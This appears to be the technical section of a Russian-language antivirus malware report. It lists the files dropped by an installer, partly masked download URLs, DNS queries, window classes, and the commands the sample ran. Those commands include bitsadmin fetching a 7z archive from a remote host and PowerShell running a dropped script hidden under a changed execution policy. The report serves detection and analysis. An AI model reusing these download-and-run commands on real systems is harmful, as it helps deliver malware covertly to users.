Техническая информация
- %TEMP%\nsaab27.tmp\modern-header.bmp
- %TEMP%\nsaab27.tmp\system.dll
- %TEMP%\nsaab27.tmp\tempfile.ps1
- %TEMP%\nsaab27.tmp\nsexec.dll
- %TEMP%\nsaab27.tmp\dialer.dll
- C:\bitf389.tmp
- %TEMP%\nsaab27.tmp\inetc.dll
- C:\bitf389.tmp
- C:\zip.7z
- C:\bitf389.tmp в C:\zip.7z
- http://yo###estsw.com/sw/dls.7z
- http://fa###ence.com/campaign/?ty#################################################
- DNS ASK yo###estsw.com
- DNS ASK fa###ence.com
- ClassName: '#32770' WindowName: ''
- ClassName: 'SysListView32' WindowName: ''
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -inputformat none -ExecutionPolicy RemoteSigned -File "%TEMP%\nsaAB27.tmp\tempfile.ps1"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -inputformat none -ExecutionPolicy RemoteSigned -File "%TEMP%\nsaAB27.tmp\tempfile.ps1"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -inputformat none -ExecutionPolicy RemoteSigned -File "%TEMP%\nsaAB27.tmp\tempfile.ps1"' (со скрытым окном)
- '%WINDIR%\syswow64\bitsadmin.exe' /Transfer helper http://yo###estsw.com/sw/dls.7z C:\zip.7z' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -inputformat none -ExecutionPolicy RemoteSigned -File "%TEMP%\nsaAB27.tmp\tempfile.ps1"' (со скрытым окном)
- '%WINDIR%\syswow64\bitsadmin.exe' /Transfer helper http://yo###estsw.com/sw/dls.7z C:\zip.7z